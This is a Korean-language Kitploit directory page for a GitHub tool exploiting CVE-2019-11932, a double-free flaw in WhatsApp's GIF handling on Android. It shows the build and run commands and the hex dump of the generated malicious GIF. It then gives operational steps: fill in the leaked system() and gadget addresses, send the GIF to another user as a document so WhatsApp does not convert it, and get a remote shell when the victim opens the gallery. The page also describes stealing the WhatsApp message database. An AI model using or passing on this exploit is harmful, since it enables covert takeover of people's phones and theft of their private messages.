Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2019-11932 — GIF를 통해 포트로 익스플로잇을 만들어 왓츠앱을 해킹하는 프로그램. | Kitploit
도구/GitHubGitHub/fastmo/cve-2019-11932
Android SecurityPayload GenerationVulnerability AnalysisExploitationMobile SecurityRemote Access ToolBinary Exploitation
GitHubfastmo/cve-2019-11932

CVE-2019-11932

GIF를 통해 포트로 익스플로잇을 만들어 왓츠앱을 해킹하는 프로그램.

저장소 보기
17115년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2019-11932

system() 주소와 gadget은 정보 공개 취약점으로 발견된 실제 주소로 교체해야 합니다.

system() 주소와 gadget을 교체한 후, 손상된 GIF 파일을 생성하는 코드를 실행하십시오:

root@kitploit:~
notroot@osboxes:~/Desktop/gif$ make
.....
.....
.....
notroot@osboxes:~/Desktop/gif$ ./exploit exploit.gif
buffer = 0x7ffc586cd8b0 size = 266
47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC
FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00
00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08
9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 84 9C 09 B0
C5 07 00 00 00 74 DE E4 11 F3 06 0F 08 37 63 40
C4 C8 21 C3 45 0C 1B 38 5C C8 70 71 43 06 08 1A
34 68 D0 00 C1 07 C4 1C 34 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 54 12 7C C0 C5 07 00 00 00 EE FF FF 2C 00 00
00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00
18 00 0A 00 0F 00 01 00 00 3B

그런 다음 exploit.gif 파일을 복사하여 WhatsApp에서 문서(Document)로 다른 WhatsApp 사용자에게 보내십시오. 멀티미디어 파일로 보내면 안 된다는 점에 유의하십시오. 그렇지 않으면 WhatsApp이 보내기 전에 MP4로 변환하려고 시도합니다. 사용자가 악성 GIF 파일을 받으면, 사용자가 친구에게 멀티미디어 파일을 보내기 위해 WhatsApp 갤러리를 열기 전까지는 아무 일도 일어나지 않습니다.

#지침

WhatsApp GIF 공격 벡터(미니 뉴스 및 마지막 지침)

root@kitploit:~
                              -----미니 뉴스 및 지침----

WhatsApp GIF 해킹은 두 가지 방식으로 실행될 수 있습니다.

로컬 권한 승격 단계 (사용자 앱에서 WhatsApp으로): 악성 앱이 Android 기기에 설치됩니다. 앱은 zygote 라이브러리의 주소를 수집하고 WhatsApp에서 코드 실행을 초래하는 악성 GIF 파일을 생성합니다. 이로 인해 악성 앱이 메시지 데이터베이스를 포함한 WhatsApp 샌드박스의 파일을 훔칠 수 있습니다. 원격 코드 실행: 원격 메모리 정보 노출 취약점이 있는 앱과 결합됩니다. 공격자는 zygote 라이브러리의 주소를 수집하고 악성 GIF 파일을 생성하여 WhatsApp을 통해 사용자에게 보낼 수 있습니다. (첨부 파일로 보내야 하며, 갤러리 선택기(Gallery Picker)를 통한 이미지로 보내면 안 됩니다. WhatsApp이 멀티미디어 파일을 MP4로 변환하려고 시도하여 악성 GIF가 무용지물이 되기 때문입니다). 사용자가 WhatsApp에서 갤러리 보기를 여는 즉시, GIF 파일은 WhatsApp 컨텍스트에서 원격 셸을 활성화합니다. 읽어야 할 글: 이전에 전혀 몰랐던 Fitbit 해킹 4가지 최신 Android의 WhatsApp은 해킹 가능합니다. Android 8.1 및 9.0 버전은 악용 가능하지만, 이전 버전은 그렇지 않습니다. 연구원은 이중 해제(double-free) 오류가 이전 OS 버전에서 여전히 트리거될 수 있지만, 악성 코드가 실행되어 RCE를 수행하기 전에 충돌이 발생한다고 말합니다. WhatsApp을 해킹하는 악성 GIF 결론: Facebook은 보안 문제를 인정했고 WhatsApp 버전 2.19.244에서 문제를 해결했습니다. Facebook은 이것이 큰 문제가 아닌 것처럼 보이게 하려 했지만, 실제로는 상당히 불쾌한 취약점입니다. 늘 그렇듯이, 앱을 최신 상태로 유지하고 불필요한 앱을 설치하지 마십시오.

--------------------------------------------------------단계---------------------------------------------------------------------------

이 저장소에 있는 코드를 컴파일하기만 하면 됩니다. system() 주소와 gadget은 GIF가 어떤 RCE를 수행하기 전에, 다른 기법을 사용하여 직접 찾아야 하는 정보 공개 취약점으로 발견된 실제 주소로 교체해야 합니다. 위 링크에 언급된 코드를 컴파일한 후, 내용을 GIF 파일에 복사하고 WhatsApp에서 문서(Document)로 다른 WhatsApp 사용자에게 보내십시오. 멀티미디어 파일로 보내지 마십시오. 그렇지 않으면 WhatsApp이 보내기 전에 MP4로 변환하려고 시도합니다. 사용자가 악성 GIF 파일을 받으면, 사용자가 친구에게 멀티미디어 파일을 보내기 위해 WhatsApp 갤러리를 열기 전까지는 아무 일도 일어나지 않습니다.

도구 다운로드